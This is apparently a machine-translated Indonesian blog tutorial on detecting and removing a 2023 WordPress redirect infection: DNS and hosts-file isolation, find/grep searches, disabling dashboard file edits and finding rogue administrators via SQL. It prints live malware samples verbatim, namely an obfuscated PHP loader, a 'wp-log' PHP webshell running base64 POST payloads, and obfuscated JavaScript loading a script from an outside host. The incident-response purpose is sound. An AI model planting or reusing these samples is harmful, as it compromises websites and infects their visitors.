Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress itu pasti platform yang paling banyak digunakan CMS (Content Management System) untuk blog dan toko online pemula (dengan modul WooCommerce), yang menjadikannya paling diincar oleh serangan komputer (hacking). Salah satu operasi peretasan yang paling banyak digunakan bertujuan untuk mengalihkan situs web yang disusupi ke halaman web lain. Redirect WordPress Hack 2023 adalah malware yang relatif baru yang berdampak mengarahkan seluruh situs ke halaman web spam atau yang pada gilirannya dapat menginfeksi komputer pengguna.

Jika situs Anda berkembang di WordPress dialihkan ke situs lain, maka kemungkinan besar itu adalah korban dari peretasan pengalihan yang sudah terkenal.

Dalam tutorial ini Anda akan menemukan informasi yang diperlukan dan tip berguna yang dapat digunakan untuk menghapus virus situs web yang terinfeksi pengalihan WordPress Hack (Virus Redirect). Melalui komentar Anda bisa mendapatkan informasi tambahan atau meminta bantuan.

Cuprin

Deteksi virus yang mengalihkan situs WordPress

Penurunan lalu lintas situs web yang tiba-tiba dan tidak dapat dibenarkan, penurunan jumlah pesanan (dalam kasus toko online) atau pendapatan iklan adalah tanda pertama bahwa ada sesuatu yang salah. Mendeteksi "Redirect WordPress Hack 2023” (Virus Redirect) juga bisa dilakukan secara “visual” saat Anda membuka website dan Anda dialihkan ke halaman web lain.

Dari pengalaman, sebagian besar malware web kompatibel dengan browser internet: Chrome, Firefox, Edge, Opera. Jika Anda adalah pengguna komputer Mac, virus ini tidak terlalu terlihat di browser Safari. Sistem keamanan dari Safari diam-diam memblokir skrip berbahaya ini.

Apa yang harus dilakukan jika Anda memiliki situs web yang terinfeksi Redirect WordPress Hack

Saya harap langkah pertama adalah tidak panik atau menghapus situs web. Bahkan file yang terinfeksi atau virus tidak boleh dihapus terlebih dahulu. Mereka berisi informasi berharga yang dapat membantu Anda memahami di mana letak pelanggaran keamanan dan apa yang memengaruhi virus. Modus operandi.

Tutup situs web untuk umum.

Bagaimana Anda menutup situs web virus untuk pengunjung? Yang paling sederhana adalah menggunakan pengelola DNS dan menghapus IP untuk "A" (nama domain) atau menentukan IP yang tidak ada. Dengan demikian, pengunjung website akan terlindungi dari hal ini redirect WordPress hack yang dapat mengarahkan mereka ke halaman web virus atau SPAM.

Jika Anda menggunakan CloudFlare sebagai pengelola DNS, Anda masuk ke akun dan menghapus data DNS "A” untuk nama domain. Dengan demikian, domain yang terkena virus akan tetap tanpa IP, tidak lagi dapat diakses dari Internet.

Anda menyalin IP situs web dan "merutekannya" sehingga hanya Anda yang dapat mengaksesnya. Dari komputer Anda.

Cara mengubah IP asli situs web di komputer Windows?

Metode ini sering digunakan untuk memblokir akses ke situs web tertentu dengan mengedit file "hosts".

1. Anda membuka Notepad atau editor teks lainnya (dengan hak administrator) dan edit file "hosts". Itu terletak di:

C:\Windows\System32\drivers\etc\hosts

2. Di file "hosts", tambahkan "rute" ke IP asli situs web Anda. IP dihapus di atas dari pengelola DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Simpan file dan akses situs web di browser.

Jika situs web tidak terbuka dan Anda tidak melakukan kesalahan pada file "hosts", kemungkinan besar itu adalah cache DNS.

Untuk menghapus cache DNS pada sistem operasi Windows, membuka Command Prompt, tempat Anda menjalankan perintah:

ipconfig /flushdns

Cara mengubah IP asli situs web di komputer Mac / MacBuku?

Untuk pengguna komputer Mac agak lebih mudah untuk mengubah IP sebenarnya dari sebuah situs web.

1. Buka utilitas Terminal.

2. Jalankan baris perintah (membutuhkan kata sandi sistem untuk menjalankan):

sudo nano /etc/hosts

3. Sama seperti untuk komputer Windows, tambahkan IP sebenarnya dari domain tersebut.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Simpan perubahan. Ctrl+X (y).

Setelah Anda "mengalihkan", Anda adalah satu-satunya orang yang dapat mengakses situs web yang terinfeksi Redirect WordPress Hack.

Pencadangan situs web lengkap – File dan basis data

Bahkan jika itu terinfeksi dengan "redirect WordPress hack”, rekomendasinya adalah membuat cadangan umum dari seluruh situs web. File dan basis data. Mungkin Anda juga dapat menyimpan salinan lokal dari kedua file tersebut public / public_html serta databasenya.

Identifikasi file yang terinfeksi dan yang dimodifikasi oleh Redirect WordPress Hack 2023

File target utama dari WordPress ada index.php (di akar), header.php, index.php şi footer.php dari tema WordPress aktiva. Periksa file ini secara manual dan identifikasi kode berbahaya atau skrip malware.

Pada tahun 2023, virus “Redirect WordPress Hack” dimasukkan index.php kode bentuk:

(Saya tidak menyarankan menjalankan kode-kode ini!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Diterjemahkan, ini skrip berbahaya itu pada dasarnya adalah konsekuensi dari situs web yang terinfeksi WordPress. Ini bukan skrip di balik malware, melainkan skrip yang memungkinkan untuk mengalihkan halaman web yang terinfeksi. Jika kita memecahkan kode skrip di atas, kita mendapatkan:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Untuk mengidentifikasi semua file di server yang berisi kode ini, ada baiknya memiliki akses SSH ke server untuk menjalankan pemeriksaan file dan manajemen baris perintah Linux.

Terkait: Cara mengetahui apakah blog Anda terinfeksi atau tidak, dengan bantuan Google Search . (WordPress Virus)

Di bawah ini adalah dua perintah yang sangat membantu untuk mengidentifikasi file yang baru saja dimodifikasi dan file yang berisi kode (string) tertentu.

Bagaimana Anda melihat di Linux File PHP berubah dalam 24 jam terakhir atau kerangka waktu lainnya?

Pesan “find” sangat mudah digunakan dan memungkinkan penyesuaian untuk mengatur jangka waktu, jalur pencarian, dan jenis file.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Dalam output Anda akan menerima informasi tentang tanggal dan waktu file diubah, izin tulis / baca / eksekusi (chmod) dan milik grup/pengguna mana.

Jika Anda ingin memeriksa lebih banyak hari yang lalu, ubah nilainya "-mtime -1” atau gunakan “-mmin -360” selama beberapa menit (6 jam).

Bagaimana cara mencari kode (string) di dalam file PHP, Java?

Baris perintah "temukan" yang memungkinkan Anda menemukan dengan cepat semua file PHP atau Java yang berisi kode tertentu adalah sebagai berikut:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Perintah akan mencari dan menampilkan file .php şi .js mengandung "uJjBRODYsU".

Dengan bantuan dua perintah di atas Anda akan sangat mudah mengetahui file mana yang baru saja dimodifikasi dan mana yang berisi kode malware.

Menghapus kode berbahaya dari file yang dimodifikasi tanpa mengorbankan kode yang benar. Dalam skenario saya, malware ditempatkan sebelum dibuka <head>.

Saat menjalankan perintah "temukan" pertama, sangat mungkin untuk menemukan file baru di server, yang bukan milik Anda WordPress atau diletakkan di sana oleh Anda. File milik jenis virus Redirect WordPress Hack.

Dalam skenario yang saya selidiki, file dalam bentuk “wp-log-nOXdgD.php". Ini adalah file "spawn" yang juga berisi kode malware yang digunakan oleh virus untuk pengalihan.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Tujuan dari file bertipe "wp-log-*” adalah menyebarkan virus peretasan pengalihan ke situs web lain yang dihosting di server. Ini adalah kode malware dari jenis “webshell” terdiri dari a bagian dasar (di mana beberapa variabel terenkripsi didefinisikan) dan o bagian eksekusi di mana penyerang mencoba memuat dan mengeksekusi kode berbahaya pada sistem.

Jika ada variabel POST bernama 'bh' dan nilai terenkripsinya MD5 adalah sama dengan "8f1f964a4b4d8d1ac3f0386693d28d03", lalu muncul skrip untuk menulis konten terenkripsi base64 variabel lain yang disebut 'b3' dalam file sementara dan kemudian mencoba memasukkan file sementara ini.

Jika ada variabel POST atau GET bernama 'tick', skrip akan merespons dengan nilai MD5 dari string"885".

Untuk mengidentifikasi semua file di server yang berisi kode ini, pilih string yang umum, lalu jalankan perintah “find” (mirip dengan yang di atas). Hapus semua file yang berisi kode malware ini.

Kelemahan keamanan dieksploitasi oleh Redirect WordPress Hack

Kemungkinan besar virus pengalihan ini datang melalui eksploitasi pengguna administrasi WordPress atau dengan mengidentifikasi a plugin yang rentan yang memungkinkan penambahan pengguna dengan hak istimewa administrator.

Untuk sebagian besar situs web yang dibangun di atas platform WordPress itu mungkin mengedit file tema atau plugindari antarmuka administrasi (Dashboard). Dengan demikian, orang jahat dapat menambahkan kode malware ke file tema untuk membuat skrip yang ditampilkan di atas.

Contoh kode malware tersebut adalah ini:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript diidentifikasi di header tema WordPress, segera setelah label dibuka <head>.

Cukup sulit untuk menguraikan JavaScript ini, tetapi jelas bahwa JavaScript menanyakan alamat web lain dari mana kemungkinan besar mengambil skrip lain untuk membuat file "wp-log-*” yang saya bicarakan di atas.

Temukan dan hapus kode ini dari semua file PHP terpengaruh.

Sejauh yang saya tahu, kode ini ditambahkan secara manual oleh pengguna baru dengan hak administratif.

Jadi, untuk mencegah penambahan malware dari Dashboard, sebaiknya nonaktifkan opsi edit WordPress Tema / Plugin dari Dashboard.

Mengedit file wp-config.php dan tambahkan baris:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Setelah melakukan perubahan ini, tidak ada pengguna WordPress Anda tidak dapat lagi mengedit file dari Dasbor.

Periksa pengguna dengan peran Administrator

Di bawah ini adalah kueri SQL yang dapat Anda gunakan untuk mencari pengguna dengan peran administrator di platform WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Kueri ini akan mengembalikan semua pengguna di tabel wp_users yang ditugaskan peran administrator. Kueri juga dilakukan untuk tabel wp_usermeta untuk mencari di meta 'wp_capabilities', yang berisi informasi tentang peran pengguna.

Metode lain adalah mengidentifikasi mereka dari: Dashboard → Users → All Users → Administrator. Namun, ada praktik di mana pengguna dapat disembunyikan di panel Dasbor. Jadi, cara terbaik untuk melihat pengguna "Administrator"di WordPress adalah perintah SQL di atas.

Dalam kasus saya, saya mengidentifikasi di database pengguna dengan nama "wp-import-user". Cukup sugestif.

Juga dari sini Anda dapat melihat tanggal dan waktu pengguna WordPress telah dibuat. ID pengguna juga sangat penting karena mencari log server. Dengan cara ini Anda dapat melihat semua aktivitas pengguna ini.

Hapus pengguna dengan peran administrator yang Anda tidak tahu, kemudian mengubah kata sandi kepada semua pengguna administratif. Editor, Pengarang, Administrator.

Ubah kata sandi pengguna database SQL dari situs web yang terpengaruh.

Setelah melakukan langkah-langkah ini, situs web dapat dimulai ulang untuk semua pengguna.

Perlu diingat, bagaimanapun, bahwa apa yang saya sajikan di atas adalah salah satu dari ribuan skenario di mana sebuah situs web terinfeksi Redirect WordPress Hack pada tahun 2023.

Jika situs web Anda telah terinfeksi dan Anda memerlukan bantuan atau jika Anda memiliki pertanyaan, bagian komentar terbuka.